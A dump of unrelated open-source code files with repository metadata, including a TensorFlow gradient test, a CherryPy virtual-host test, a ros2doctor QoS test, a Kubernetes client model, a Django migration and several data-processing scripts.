| 270,657,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
# Merge the per-seed crawler test results (one CSV per random seed) into a
# single CSV, suffixing each kept column with its seed number.
t1 = pd.read_csv("test_1.csv")
t2 = pd.read_csv("test_2.csv")
t3 = pd.read_csv("test_3.csv")
files = [t1,t2,t3]
di = {}
for i, file in enumerate(files):
    for col in file.columns:
        # Skip columns whose name starts with "U" -- presumably pandas
        # "Unnamed: 0" index columns; TODO confirm against the CSV headers.
        if col[0] != "U":
            name = col + "_seed_{}".format(i+1)
            di[name] = file[col]
frame = pd.DataFrame(di)
frame.to_csv("Crawler_CASNET_test.csv")
|
[
"ashishmalik7017@gmail.com"
] |
ashishmalik7017@gmail.com
|
383d7a4ec52c2853b77bfe31e940ffda2d8eb356
|
82b50cebff69927d4394378522ae96524950fff4
|
/pointnet_ops/python/ops/interpolate_ops_test.py
|
f6a478248088b8f9c2a5e4775093df4d606239aa
|
[
"MIT"
] |
permissive
|
jackd/pointnet_ops
|
1b8a44bccbb2d9d3d5763b725f8972ad096a8a14
|
26d9b85ce4b503fac7547b965e233442aa243430
|
refs/heads/master
| 2020-04-29T01:35:10.644187
| 2019-11-07T00:08:01
| 2019-11-07T00:08:01
| 175,735,495
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,836
|
py
|
# Copyright 2018 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for interpolate ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from interpolate_ops import three_interpolate
from interpolate_ops import three_nn
import tensorflow as tf
class GroupPointTest(tf.test.TestCase):
    """Numerical gradient check for the custom three_interpolate op."""

    def test_grad(self):
        """Verify analytic vs. numeric gradients of three_interpolate.

        Builds random features for 8 points, finds the 3 nearest neighbours
        of 128 query points, interpolates with uniform (1/3) weights, and
        asserts the gradient error w.r.t. the input features is < 1e-4.
        """
        with self.test_session():
            # (batch=1, 8 points, 16 feature channels)
            points = tf.constant(np.random.random((1, 8, 16)).astype('float32'))
            # 128 query positions and the 8 known positions, both in 3-D.
            xyz1 = tf.constant(np.random.random((1, 128, 3)).astype('float32'))
            xyz2 = tf.constant(np.random.random((1, 8, 3)).astype('float32'))
            dist, idx = three_nn(xyz1, xyz2)
            # Uniform interpolation weights over the 3 neighbours.
            weight = tf.ones_like(dist) / 3.0
            interpolated_points = three_interpolate(points, idx, weight)
            err = tf.test.compute_gradient_error(points, (1, 8, 16),
                                                 interpolated_points,
                                                 (1, 128, 16))
            self.assertLess(err, 1e-4)
if __name__ == '__main__':
    tf.test.main()  # standard TensorFlow test entry point
|
[
"thedomjack@gmail.com"
] |
thedomjack@gmail.com
|
7fd7d2d3435692240151409412192953b899d325
|
2ff7e53d5e512cd762217ca54317982e07a2bb0c
|
/cherrypy/test/test_wsgi_vhost.py
|
a7cbc1e110cbfd03a130821cba176cd2cc2bc53c
|
[] |
no_license
|
nanxijw/Clara-Pretty-One-Dick
|
66d3d69426642b79e8fd4cc8e0bec23adeeca6d6
|
50de3488a2140343c364efc2615cf6e67f152be0
|
refs/heads/master
| 2021-01-19T09:25:07.555284
| 2015-02-17T21:49:33
| 2015-02-17T21:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,102
|
py
|
#Embedded file name: cherrypy/test\test_wsgi_vhost.py
import cherrypy
from cherrypy.test import helper
class WSGI_VirtualHost_Test(helper.CPWebCase):
    """Checks that cherrypy._cpwsgi.VirtualHost dispatches on the Host header."""

    def setup_server():
        # Called by the CPWebCase harness without an instance, hence the
        # staticmethod wrapping below rather than a decorator.

        class ClassOfRoot(object):
            """Root app whose index greets visitors of one class-year site."""

            def __init__(self, name):
                self.name = name

            def index(self):
                return 'Welcome to the %s website!' % self.name
            index.exposed = True

        default = cherrypy.Application(None)
        domains = {}
        for year in range(1997, 2008):
            # One application per virtual host www.classofYYYY.example.
            app = cherrypy.Application(ClassOfRoot('Class of %s' % year))
            domains['www.classof%s.example' % year] = app

        cherrypy.tree.graft(cherrypy._cpwsgi.VirtualHost(default, domains))
    setup_server = staticmethod(setup_server)

    def test_welcome(self):
        # Only meaningful when the server actually runs behind WSGI.
        if not cherrypy.server.using_wsgi:
            return self.skip('skipped (not using WSGI)... ')
        for year in range(1997, 2008):
            # The Host header alone should select the per-year application.
            self.getPage('/', headers=[('Host', 'www.classof%s.example' % year)])
            self.assertBody('Welcome to the Class of %s website!' % year)
|
[
"billchang.e@gmail.com"
] |
billchang.e@gmail.com
|
891131987930169977089ef3876a01ab735f4942
|
a3e34daf7cf75f98d54b7d183f68e50277a6479b
|
/sources/XML projects/IBN EZRA/parse.py
|
71b51b7d8f32ca018977270a23b497b3c19866af
|
[] |
no_license
|
TomaszWaszczyk/Sefaria-Data
|
2d0f1544c071340bffd87585e6883ef77df41495
|
db2e136a14c6d08d98925da3afdf6373fec92de1
|
refs/heads/master
| 2023-06-07T07:56:24.332834
| 2021-06-20T15:53:56
| 2021-06-20T15:53:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,952
|
py
|
# -*- coding: utf-8 -*-
__author__ = 'stevenkaplan'
from sources.functions import *
from sefaria.model import *
from data_utilities.XML_to_JaggedArray import XML_to_JaggedArray
from sefaria.helper.schema import *
import bleach
SERVER = "https://ste.cauldron.sefaria.org"
def reorder_modify(text):
    """Strip all HTML tags from *text* and return the cleaned string."""
    cleaned = bleach.clean(text, strip=True)
    return cleaned
def get_dict_of_names(file):
    """Read a two-column CSV and return a mapping of column 0 -> column 1.

    :param file: path to the CSV file; every row must have >= 2 fields.
    :return: dict mapping each row's first field to its second field.
    """
    import csv
    # Use a context manager so the file handle is always closed (the
    # original left the handle open), and avoid shadowing builtin `dict`.
    names = {}
    with open(file) as f:
        for row in csv.reader(f):
            names[row[0]] = row[1]
    return names
def change_priority(dict_of_names):
    """Stub: intended to update title priorities from the name mapping.

    Not implemented yet -- currently a no-op.
    """
    pass
def tester(x):
return x.tag == "h1"
if __name__ == "__main__":
    # Parse every "IBN ...xml" file in the current directory into a Sefaria
    # JaggedArray and post it to SERVER as an "Ibn Ezra on <book>" text.
    #add_term("Preface", u"פתח דבר", "pseudo_toc_categories", "http://localhost:8000")
    #create_schema("Responsa to Chaplains", u"משהו", ["Halakhah"])
    post_info = {}
    volume = 2
    post_info["language"] = "en"
    post_info["server"] = SERVER
    # XML tags/attributes the parser is allowed to keep.
    allowed_tags = ["volume", "book", "ack", "intro", "preface", "bibl", "part", "chapter", "p", "ftnote", "title", "ol", "footnotes", "appendix"]
    allowed_attributes = ["id"]
    p = re.compile("\d+a?\.")
    post_info["versionTitle"] = "Ibn Ezra's commentary on the Pentateuch, tran. and annot. by H. Norman Strickman and Arthur M. Silver. Menorah Pub., 1988-2004"
    post_info["versionSource"] = "https://www.nli.org.il/he/books/NNL_ALEPH001102376/NLI"
    # NOTE(review): this initial value is overwritten per-file below.
    title = "Ibn Ezra"
    for file in os.listdir("."):
        print(file)
        if file.endswith("xml") and "IBN" in file:
            with open(file) as f:
                contents = f.read()
            # Book name is the last "_"-separated piece of the filename.
            title = "Ibn Ezra on {}".format(file.split("_")[-1].replace(".xml", ""))
            parser = XML_to_JaggedArray(title, contents, allowed_tags, allowed_attributes, post_info, change_name=True, image_dir="./images",
                                        titled=True, print_bool=True)
            parser.set_funcs(reorder_modify=reorder_modify, reorder_test=tester)
            parser.run()
|
[
"steve@sefaria.org"
] |
steve@sefaria.org
|
fbe5b3bc53d4ca5e5279b5e32b1207f84aea771a
|
00c6ded41b84008489a126a36657a8dc773626a5
|
/.history/Sizing_Method/ConstrainsAnalysis/DesignPointSelectStrategy_20210714191430.py
|
04f5745a8803874ada846022a476fba426fada70
|
[] |
no_license
|
12libao/DEA
|
85f5f4274edf72c7f030a356bae9c499e3afc2ed
|
1c6f8109bbc18c4451a50eacad9b4dedd29682bd
|
refs/heads/master
| 2023-06-17T02:10:40.184423
| 2021-07-16T19:05:18
| 2021-07-16T19:05:18
| 346,111,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,729
|
py
|
# author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysisPD as ca_pd
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysisPDP1P2 as ca_pd_12
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class Design_Point_Select_Strategy:
"""This is a design point select strategy from constrains analysis"""
def __init__(self, altitude, velocity, beta, method, p_turbofan_max, p_motorfun_max, n=12):
"""
:param altitude: m x 1 matrix
:param velocity: m x 1 matrix
:param beta: P_motor/P_total m x 1 matrix
:param p_turbofan_max: maximum propulsion power for turbofan (threshold value)
:param p_motorfun_max: maximum propulsion power for motorfun (threshold value)
:param n: number of motor
the first group of condition is for stall speed
the stall speed condition have to use motor, therefore with PD
:return:
power load: design point p/w and w/s
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.n_motor = n
self.p_turbofan_max = p_turbofan_max
self.p_motorfun_max = p_motorfun_max
# initialize the p_w, w_s, hp, n, m
self.n = 100
self.m = len(self.h)
self.hp = np.linspace(0, 1, self.n)
self.hp_threshold = self.p_motorfun_max / (self.p_motorfun_max + self.p_turbofan_max)
# method1 = Mattingly_Method, method2 = Gudmundsson_Method
if method == 1:
self.method1 = ca_pd_12.ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun
self.method2 = ca_pd_12.ConstrainsAnalysis_Mattingly_Method_with_DP_electric
else:
self.method1 = ca_pd_12.ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun
self.method2 = ca_pd_12.ConstrainsAnalysis_Gudmundsson_Method_with_DP_electric
problem = self.method(self.h[0], self.v[0], self.beta[0], 6000, self.hp_threshold)
self.w_s = problem.allFuncs[0](problem)
def p_w_compute(self):
p_w = np.zeros([self.m, self.n]) # m x n matrix
for i in range(1, 8):
for j in range(self.n):
problem1 = self.method1(self.h[i], self.v[i],
self.beta[i], self.w_s, self.hp[j])
problem2 = self.method2(self.h[i], self.v[i],
self.beta[i], self.w_s, self.hp[j])
if i >= 5:
p_w_1 = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w_2 = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w_1 = problem1.allFuncs[i](problem1)
p_w_2 = problem2.allFuncs[i](problem2)
if p_w_1 > self.p_turbofan_max:
p_w_1 = 100000
elif p_w_2 > self.p_motorfun_max:
p_w_2 = 100000
self.p_w[i, j] = p_w_1 + p_w_2
return p_w
def strategy(self):
p_w = Design_Point_Select_Strategy.p_w_compute(self)
#find the min p_w for difference hp for each flight condition:
p_w_min = np.amax(p_w, axis=1)
hp_p_w_min = np.array(np.where(p_w == p_w_min))
design_p
|
[
"libao@gatech.edu"
] |
libao@gatech.edu
|
a65e513b2a58d300144f7c80b24d882cad985edc
|
a0ca6e78f0500e6bfc874cdb4ad79869c0fc4e81
|
/plot_admitted.py
|
027c0de8432efea3e6c2e5c09fc897a98567b1f0
|
[] |
no_license
|
kshedden/micovid
|
e25fc834e4fe9f55fdd80a40d68c134a9912bc3c
|
1f85d84645707d4bb5e6bc913e667d666ce10a85
|
refs/heads/master
| 2022-11-23T23:46:09.794802
| 2020-07-20T02:57:57
| 2020-07-20T02:57:57
| 275,910,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,281
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.dates as mdates
import json
import gzip
# Month-granularity ticks and labels for the shared x axis.
months = mdates.MonthLocator()
months_fmt = mdates.DateFormatter("%b")

# ratio_results.json.gz maps "PREFIX:Admit"/"PREFIX:Total" keys to series of
# [day-offset, log-value] pairs -- presumably; confirm against the producer.
with gzip.open("/nfs/kshedden/Daniel_Keyes/ratio_results.json.gz") as gid:
    dm = json.load(gid)

pdf = PdfPages("admit_ratios.pdf")

# Collect the distinct key prefixes (everything before the last ":").
px = []
for ky in dm.keys():
    px.append(":".join(ky.split(":")[0:-1]))
px = list(set(px))
px.sort()

# One page per prefix: plot exp(log(Admit) - log(Total)) over 2020 dates.
for kp in px:
    plt.clf()
    plt.figure(figsize=(7, 5))
    plt.axes([0.1, 0.11, 0.8, 0.8])
    plt.grid(True)
    try:
        dun = dm[kp + ":Admit"]
        dud = dm[kp + ":Total"]
    except KeyError:
        # Skip prefixes that lack either series.
        continue
    dun = np.asarray(dun).T
    dud = np.asarray(dud).T
    # Column 0 is the day offset from 2020-01-01.
    dd = pd.to_datetime("2020-01-01") + pd.to_timedelta(dun[:, 0], 'd')
    # NOTE(review): `ky` is left over from the earlier loop over dm.keys();
    # this likely should use `kp` -- confirm before relying on the label.
    xt = ky.split(":")[-1]
    plt.plot(dd, np.exp(dun[:, 1] - dud[:, 1]), label=xt, color='black', alpha=0.6)
    plt.gca().xaxis.set_major_locator(months)
    plt.gca().xaxis.set_major_formatter(months_fmt)
    plt.xlabel("Date (2020)", size=14)
    plt.ylabel("Ratio relative to 2019", size=14)
    plt.ylim(ymin=0)
    ti = kp.split(":")
    ti[1] = ti[1].lower()
    plt.title(" ".join(ti) + "s")
    pdf.savefig()

pdf.close()
|
[
"kshedden@umich.edu"
] |
kshedden@umich.edu
|
d1de944f71e0ff37476071f7eb2400ef4bf5ca6e
|
d4e9fd6dd51d29ad374b460a2cfbd467502ede7d
|
/ros2doctor/test/test_qos_compatibility.py
|
cb21bedba5e8d26abe78afc768015c3139e5efed
|
[
"Apache-2.0"
] |
permissive
|
ros2/ros2cli
|
3f7b93ff44d18b2292a50d3b6ff119494142328b
|
351ef3c7442f49013d84084dea23fe399517690f
|
refs/heads/rolling
| 2023-08-07T03:53:23.635067
| 2023-08-03T19:50:28
| 2023-08-03T19:50:28
| 93,568,427
| 142
| 157
|
Apache-2.0
| 2023-09-14T07:36:46
| 2017-06-06T22:13:14
|
Python
|
UTF-8
|
Python
| false
| false
| 6,588
|
py
|
# Copyright 2021 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import os
import sys
import unittest
from launch import LaunchDescription
from launch.actions import ExecuteProcess
from launch_ros.actions import Node
import launch_testing
import launch_testing.actions
import launch_testing.asserts
import launch_testing.markers
import launch_testing.tools
import launch_testing_ros.tools
import pytest
from rclpy.utilities import get_available_rmw_implementations
# Skip cli tests on Windows while they exhibit pathological behavior
# https://github.com/ros2/build_farmer/issues/248
if sys.platform.startswith('win'):
pytest.skip(
'CLI tests can block for a pathological amount of time on Windows.',
allow_module_level=True)
@pytest.mark.rostest
@launch_testing.parametrize('rmw_implementation', get_available_rmw_implementations())
def generate_test_description(rmw_implementation):
    """Launch two talker/listener pairs -- one QoS-compatible, one not --
    behind a freshly restarted ros2 daemon, for every available RMW."""
    path_to_fixtures = os.path.join(os.path.dirname(__file__), 'fixtures')
    additional_env = {
        'RMW_IMPLEMENTATION': rmw_implementation, 'PYTHONUNBUFFERED': '1'
    }
    # Best-effort publisher + reliable subscription -> incompatible QoS pair.
    path_to_incompatible_talker_node_script = os.path.join(
        path_to_fixtures, 'talker_node_with_best_effort_qos.py')
    # Reliable publisher + reliable subscription -> compatible QoS pair.
    path_to_compatible_talker_node_script = os.path.join(
        path_to_fixtures, 'talker_node_with_reliable_qos.py')
    path_to_listener_node_script = os.path.join(
        path_to_fixtures, 'listener_node_with_reliable_qos.py')

    talker_node_compatible = Node(
        executable=sys.executable,
        arguments=[path_to_compatible_talker_node_script],
        remappings=[('chatter', 'compatible_chatter')],
        additional_env=additional_env
    )
    listener_node_compatible = Node(
        executable=sys.executable,
        arguments=[path_to_listener_node_script],
        remappings=[('chatter', 'compatible_chatter')],
        additional_env=additional_env
    )
    talker_node_incompatible = Node(
        executable=sys.executable,
        arguments=[path_to_incompatible_talker_node_script],
        remappings=[('chatter', 'incompatible_chatter')],
        additional_env=additional_env
    )
    listener_node_incompatible = Node(
        executable=sys.executable,
        arguments=[path_to_listener_node_script],
        remappings=[('chatter', 'incompatible_chatter')],
        additional_env=additional_env
    )
    return LaunchDescription([
        # Always restart daemon to isolate tests.
        ExecuteProcess(
            cmd=['ros2', 'daemon', 'stop'],
            name='daemon-stop',
            on_exit=[
                ExecuteProcess(
                    cmd=['ros2', 'daemon', 'start'],
                    name='daemon-start',
                    on_exit=[
                        # Add incompatible talker/listener pair.
                        talker_node_incompatible,
                        listener_node_incompatible,
                        talker_node_compatible,
                        listener_node_compatible,
                        launch_testing.actions.ReadyToTest()
                    ],
                    additional_env=additional_env
                )
            ]
        ),
    ]), locals()
class TestROS2DoctorQoSCompatibility(unittest.TestCase):
    """End-to-end checks that `ros2 doctor` reports the QoS incompatibility
    arranged by generate_test_description, and only that one."""

    @classmethod
    def setUpClass(
        cls,
        launch_service,
        proc_info,
        proc_output,
        rmw_implementation,
    ):
        # Filter noisy not-yet-published warnings and normalize per-RMW
        # differences in the captured output.
        rmw_implementation_filter = launch_testing_ros.tools.basic_output_filter(
            filtered_patterns=['WARNING: topic .* does not appear to be published yet'],
            filtered_rmw_implementation=rmw_implementation
        )

        @contextlib.contextmanager
        def launch_doctor_command(self, arguments):
            # Run `ros2 doctor <arguments>` under the same RMW and yield the
            # process handle for assertions.
            doctor_command_action = ExecuteProcess(
                cmd=['ros2', 'doctor', *arguments],
                additional_env={
                    'RMW_IMPLEMENTATION': rmw_implementation,
                    'PYTHONUNBUFFERED': '1'
                },
                name='ros2doctor-cli',
                output='screen'
            )
            with launch_testing.tools.launch_process(
                launch_service, doctor_command_action, proc_info, proc_output,
                output_filter=rmw_implementation_filter
            ) as doctor_command:
                yield doctor_command
        # Bound on the class so tests call self.launch_doctor_command(...).
        cls.launch_doctor_command = launch_doctor_command

    @launch_testing.markers.retry_on_failure(times=5, delay=1)
    def test_check(self):
        """Plain `ros2 doctor` must flag the middleware module as failed."""
        with self.launch_doctor_command(
            arguments=[]
        ) as doctor_command:
            assert doctor_command.wait_for_shutdown(timeout=10)
        assert doctor_command.exit_code == launch_testing.asserts.EXIT_OK
        assert doctor_command.output
        # The failed-modules summary is the last non-empty output line.
        lines_list = [line for line in doctor_command.output.splitlines() if line]
        assert 'Failed modules' in lines_list[-1]
        assert 'middleware' in lines_list[-1]

    @launch_testing.markers.retry_on_failure(times=5, delay=1)
    def test_report(self):
        """`ros2 doctor -r/--report` must detail both topics' QoS status."""
        for argument in ['-r', '--report']:
            with self.launch_doctor_command(
                arguments=[argument]
            ) as doctor_command:
                assert doctor_command.wait_for_shutdown(timeout=10)
            assert doctor_command.exit_code == launch_testing.asserts.EXIT_OK
            assert ('topic [type] : /compatible_chatter [std_msgs/msg/String]\n'
                    'publisher node : talker_node\n'
                    'subscriber node : listener\n'
                    'compatibility status : OK') in doctor_command.output
            assert ('topic [type] : /incompatible_chatter [std_msgs/msg/String]\n'
                    'publisher node : talker_node\n'
                    'subscriber node : listener\n'
                    'compatibility status : '
                    'ERROR: Best effort publisher and reliable subscription;') \
                in doctor_command.output
|
[
"noreply@github.com"
] |
ros2.noreply@github.com
|
5c8bec34b3455da38460275936f45236a1356b09
|
921aa4d0dddc868b61fe1ea3805cf15c36853bc0
|
/client/k8s_client/models/v1beta1_ingress_list.py
|
597dd9d514517fbd656459a07921c530ef9f056d
|
[] |
no_license
|
mbohlool/k8s-python-client
|
56d569071326820ebb5e11319ca230a272282a56
|
e083a1991e03f05d69a39f43b02b9bd5ede0a2b7
|
refs/heads/master
| 2021-01-09T20:29:17.339112
| 2016-08-18T23:16:49
| 2016-08-18T23:16:49
| 65,772,328
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,235
|
py
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class V1beta1IngressList(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        """
        V1beta1IngressList - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'api_version': 'str',
            'items': 'list[V1beta1Ingress]',
            'kind': 'str',
            'metadata': 'UnversionedListMeta'
        }

        self.attribute_map = {
            'api_version': 'apiVersion',
            'items': 'items',
            'kind': 'kind',
            'metadata': 'metadata'
        }

        self._api_version = None
        self._items = None
        self._kind = None
        self._metadata = None

    @property
    def api_version(self):
        """
        Gets the api_version of this V1beta1IngressList.
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources

        :return: The api_version of this V1beta1IngressList.
        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """
        Sets the api_version of this V1beta1IngressList.
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources

        :param api_version: The api_version of this V1beta1IngressList.
        :type: str
        """
        self._api_version = api_version

    @property
    def items(self):
        """
        Gets the items of this V1beta1IngressList.
        Items is the list of Ingress.

        :return: The items of this V1beta1IngressList.
        :rtype: list[V1beta1Ingress]
        """
        return self._items

    @items.setter
    def items(self, items):
        """
        Sets the items of this V1beta1IngressList.
        Items is the list of Ingress.

        :param items: The items of this V1beta1IngressList.
        :type: list[V1beta1Ingress]
        """
        self._items = items

    @property
    def kind(self):
        """
        Gets the kind of this V1beta1IngressList.
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds

        :return: The kind of this V1beta1IngressList.
        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """
        Sets the kind of this V1beta1IngressList.
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds

        :param kind: The kind of this V1beta1IngressList.
        :type: str
        """
        self._kind = kind

    @property
    def metadata(self):
        """
        Gets the metadata of this V1beta1IngressList.

        :return: The metadata of this V1beta1IngressList.
        :rtype: UnversionedListMeta
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """
        Sets the metadata of this V1beta1IngressList.

        :param metadata: The metadata of this V1beta1IngressList.
        :type: UnversionedListMeta
        """
        self._metadata = metadata

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        # dict.items() works on both Python 2 and 3; the original used
        # six.iteritems, an unnecessary third-party dependency here.
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # Bug fix: guard the type so comparing against a non-model value
        # (e.g. an int, which has no __dict__) returns NotImplemented --
        # and hence False -- instead of raising AttributeError.
        if not isinstance(other, V1beta1IngressList):
            return NotImplemented
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        # Delegates to __eq__ (Python's fallback handles NotImplemented).
        return not self == other
[
"mehdy@google.com"
] |
mehdy@google.com
|
e6265d295615293256a409e7286b429a02cc5609
|
61747f324eaa757f3365fd7bf5ddd53ea0db47d1
|
/casepro/contacts/migrations/0001_initial.py
|
6d0a371e168bc8f557ce07d0e5145cb99d59cf58
|
[
"BSD-3-Clause"
] |
permissive
|
BlueRidgeLabs/casepro
|
f8b0eefa8f961dd2fdb5da26a48b619ebc1f8c12
|
8ef509326f3dfa80bb44beae00b60cc6c4ac7a24
|
refs/heads/master
| 2022-01-24T09:01:18.881548
| 2017-12-05T18:46:05
| 2017-12-05T18:49:42
| 113,502,588
| 0
| 0
| null | 2017-12-07T21:57:37
| 2017-12-07T21:57:37
| null |
UTF-8
|
Python
| false
| false
| 3,306
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the contacts app: Contact, Field, Group and Value
    models, plus Contact's links to Group (M2M) and orgs.Org (FK).

    Auto-generated by Django; field definitions are left untouched.
    """

    dependencies = [
        ('orgs', '0014_auto_20150722_1419'),
    ]

    operations = [
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('uuid', models.CharField(unique=True, max_length=36)),
                ('name', models.CharField(help_text='The name of this contact', max_length=128, null=True, verbose_name='Full name', blank=True)),
                ('language', models.CharField(help_text='Language for this contact', max_length=3, null=True, verbose_name='Language', blank=True)),
                ('is_active', models.BooleanField(default=True, help_text='Whether this contact is active')),
                ('created_on', models.DateTimeField(help_text='When this contact was created', auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Field',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('key', models.CharField(max_length=36, verbose_name='Key')),
                ('label', models.CharField(max_length=36, null=True, verbose_name='Label')),
                ('org', models.ForeignKey(related_name='fields', verbose_name='Organization', to='orgs.Org')),
            ],
        ),
        migrations.CreateModel(
            name='Group',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('uuid', models.CharField(unique=True, max_length=36)),
                ('name', models.CharField(max_length=64)),
                ('is_active', models.BooleanField(default=True, help_text='Whether this group is active')),
                ('created_on', models.DateTimeField(help_text='When this group was created', auto_now_add=True)),
                ('org', models.ForeignKey(related_name='new_groups', verbose_name='Organization', to='orgs.Org')),
            ],
        ),
        migrations.CreateModel(
            name='Value',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('string_value', models.TextField(help_text='The string value or string representation of this value', max_length=640, null=True)),
                ('contact', models.ForeignKey(related_name='values', to='contacts.Contact')),
                ('field', models.ForeignKey(to='contacts.Field')),
            ],
        ),
        # M2M and FK links are added after Contact exists.
        migrations.AddField(
            model_name='contact',
            name='groups',
            field=models.ManyToManyField(related_name='contacts', to='contacts.Group'),
        ),
        migrations.AddField(
            model_name='contact',
            name='org',
            field=models.ForeignKey(related_name='new_contacts', verbose_name='Organization', to='orgs.Org'),
        ),
        # A field key is unique within an organization.
        migrations.AlterUniqueTogether(
            name='field',
            unique_together=set([('org', 'key')]),
        ),
    ]
|
[
"rowanseymour@gmail.com"
] |
rowanseymour@gmail.com
|
796b55262c5939d604def2ffdc5807697e8ce051
|
26eb818572061109b55e498ab4f123a4ff9b9499
|
/Stochastic_Evolutionary_Game/Stochastic_Game_Nowak_Code/Prisoners_Dilemma_Game/Matlab_Version/data.py
|
80b1c7a3ca6a564a7c4dd0b6db60554e709bee0a
|
[] |
no_license
|
Dcomplexity/Researches
|
550e49b5a5951dca11df062aae1f86e2c12945c5
|
4eb55e2550970223c2f4006d289d8f4ba70a611a
|
refs/heads/master
| 2022-04-04T02:13:56.976901
| 2020-02-01T14:34:44
| 2020-02-01T14:34:44
| 147,739,403
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
import pylab
import scipy.io as scio
# Load the cooperation-rate time series exported from MATLAB; 'ans' holds
# three rows -- presumably the whole system and two sub-populations;
# TODO confirm row order against the MATLAB script.
data = scio.loadmat('Coop_Time')
coopS = data['ans'][0]
coop1 = data['ans'][1]
coop2 = data['ans'][2]

pylab.figure()
pylab.title('Cooperation Rate with Time')
pylab.xlabel('Time')
pylab.ylabel('Cooperation Fraction')
